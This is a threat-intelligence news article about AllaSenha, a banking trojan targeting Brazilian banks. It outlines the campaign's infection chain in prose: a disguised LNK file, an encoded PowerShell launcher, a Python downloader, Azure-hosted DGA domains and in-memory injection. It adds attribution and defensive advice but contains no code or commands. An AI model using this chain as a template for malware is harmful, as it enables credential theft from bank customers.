Brazilian banking institutions are currently under assault from a sophisticated new malware campaign distributing a custom variant of the AllaKore remote access trojan (RAT), known as AllaSenha. This advanced threat specifically aims to steal credentials required for accessing Brazilian bank accounts, leveraging Microsoft’s Azure cloud as its command-and-control (C2) infrastructure.
Targeted Institutions and Attack Vector
The targets of this malicious campaign include prominent banks such as Banco do Brasil, Bradesco, Banco Safra, Caixa Econômica Federal, Itaú Unibanco, Sicoob, and Sicredi. Although the initial access vector is not definitively confirmed, it is suspected that phishing messages containing malicious links are being used to compromise systems.
The attack initiates with a malicious Windows shortcut (LNK) file disguised as a PDF document (“NotaFiscal.pdf.lnk”), hosted on a WebDAV server since at least March 2024. When the LNK file is executed, it runs a Windows command shell to open a decoy PDF file while simultaneously retrieving a BAT payload named “c.cmd” from the same server.
This BAT payload, known as the BPyCode launcher, executes a Base64-encoded PowerShell command. This command downloads the Python binary from the official Python website to run a Python script codenamed BPyCode. BPyCode acts as a downloader for a dynamic-link library (“executor.dll”), which is retrieved from domain names generated by a domain generation algorithm (DGA) associated with Microsoft Azure Functions service.
The downloaded DLL is executed in memory, leading to the deployment of AllaSenha by injecting it into a legitimate mshta.exe process. AllaSenha is designed to steal online banking account credentials from web browsers, display overlay windows to capture two-factor authentication (2FA) codes, and even trick victims into scanning a QR code to approve fraudulent transactions.
Origins and Attribution
HarfangLab, a French cybersecurity company, attributes the creation of AllaSenha to two Brazilian threat actors. The analysis revealed operational mistakes during domain registration, exposing the identities of the individuals involved. Further investigation linked one of the actors to other companies and uncovered a criminal record for the second actor. This group has been active since at least 2023, with a noticeable increase in activity from February 2024.
Broader Implications
This malware campaign is part of a broader trend of cybercriminal activity targeting financial institutions in Latin America. Similar campaigns, such as those distributing the Casbaneiro banking trojan, highlight the persistent threat posed by region-specific cyber threats. These campaigns often exploit legitimate services like Autodesk A360 Drive and GitHub to host malicious payloads, complicating detection and mitigation efforts.
To defend against such sophisticated threats, it is imperative for organizations, especially banking institutions, to adopt comprehensive cybersecurity measures:
Regular Software Updates: Ensure all systems are up-to-date with the latest security patches.
Advanced Email Filtering and Web Security: Implement robust email and web filtering solutions to block phishing attempts.
Employee Training: Conduct regular cybersecurity awareness training to help employees recognize and respond to phishing attempts.
Network Monitoring: Continuously monitor network traffic for unusual activity that may indicate a compromise.
Incident Response Plan: Develop and regularly update an incident response plan to quickly address and mitigate security breaches.
As cyber threats continue to evolve, staying informed and proactive is essential. The discovery of AllaSenha underscores the importance of vigilance and robust security practices in safeguarding financial institutions and their customers from emerging threats.